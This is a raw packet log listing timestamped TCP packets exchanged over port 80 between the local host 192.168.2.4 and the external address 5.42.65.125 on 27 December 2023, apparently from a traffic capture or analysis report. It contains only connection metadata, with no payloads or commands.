Dec 27, 2023 17:57:25.735127926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735132933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.735158920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.735172033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735186100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735224962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.735929012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735946894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735960007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735975027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735976934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.735990047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.736004114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.736006975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.736031055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.736813068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.736849070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.736895084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.737095118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.737111092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.737123966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.737159014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.737173080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.737180948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.737188101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.737221003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.737989902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738043070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.738048077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738063097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738074064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738085032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738099098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738112926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.738140106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.738914967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738928080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738939047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738972902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.738981009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.738985062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.738998890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.739012003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.739048958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.739711046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.739726067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.739747047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.739768982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.739785910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.739797115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.739818096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.739830971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.739866018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.740709066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.740732908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.740744114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.740748882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.740756035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.740768909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.740777969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.740782022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.740817070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.741466045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.741650105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.741663933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.741674900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.741689920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.741698980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.741705894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.741710901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.741729975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.742377043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.742392063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.742424965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.742455959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.742469072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.742491961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.742503881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.742505074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.742561102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.743308067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.743324041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.743335009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.743349075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.743360043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.743366957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.743374109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.743375063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.743412971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.744147062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.744167089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.744199038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.744398117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.744450092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.744463921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.744477034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.744503975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.744510889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.744525909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.744525909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.744560003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.745280981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.745321989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.745363951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.745400906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.745414019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.745424986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.745435953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.745440960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.745461941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.746201038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.746216059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.746227026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.746262074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.746262074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.746275902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.746283054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.746288061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.746325016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.747075081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.747087002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.747124910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.747129917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.747169971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.747176886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.747189999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.747200966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.747229099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.747946978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748033047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748044968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748055935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748070002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748081923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748081923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.748109102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.748881102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748894930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748905897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748919010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748929977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748938084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.748944044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.748965979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.748976946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.749665022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.749715090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.749728918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.749741077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.749752045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.749759912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.749764919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.749773026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.749800920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.750536919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.750550032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.750560999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.750572920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.750581980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.750586987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.750600100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.750602007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.750627041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.751358032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.751372099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.751414061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.751650095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.751662970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.751699924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.751704931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.751722097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.751733065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.751744032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.751756907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.751775026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.752549887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.752564907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.752577066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.752589941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.752608061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.752648115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.752660990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.752675056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.752710104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.753421068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.753434896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.753464937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.753479004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.753505945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.753520966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.753534079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.753545046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.753566027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.754245043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.754297018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.754317045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.754329920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.754343987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.754357100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.754367113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.754371881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.754398108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.755065918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.755080938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.755126953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.755137920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.755141973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.755158901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.755170107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.755176067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.755192995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.755897045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.755964041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.755973101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.755985022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756023884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.756048918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756062984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756076097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756099939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.756772995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756814003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756819963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.756827116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756850004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756869078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.756939888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.756957054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.757003069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.757919073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.757935047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.757947922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.757976055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.757986069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.757988930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758038998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758052111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758083105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.758430004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758444071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758472919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.758711100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758753061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758759022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.758830070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758889914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758908033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758923054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758935928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.758938074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.758965015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.758979082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.759850025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.759865046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.759876013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.759891033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.759902954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.759902954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.759923935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.759928942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.759938955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.759994030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.760647058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.760660887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.760673046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.760693073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.760711908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.760724068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.760737896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.760751009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.760756969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.760781050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.760792017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.761662006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.761676073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.761691093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.761706114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.761718988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.761733055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.761734009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.761744976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.761748075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.761790037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.762593031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.762607098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.762639046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.762658119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.762660980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.762679100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.762682915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.762707949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.762723923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.762727022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.762774944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.763571978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.763587952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.763600111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.763612986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.763627052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.763639927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.763650894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.763652086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.763679028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.764560938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.764610052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.764615059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.764625072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.764641047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.764684916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.764687061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.764703989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.764718056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.764741898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.764767885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.765531063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.765583992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.765599012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.765638113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.765678883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.765692949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.765707970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.765719891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.765724897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.765733957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.765748978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.765775919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.766638041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.766673088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.766685963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.766700029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.766715050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.766727924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.766732931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.766742945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.766758919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.766778946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.767494917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.767509937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.767523050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.767563105 CET	49738	80	192.168.2.4	5.42.65.125
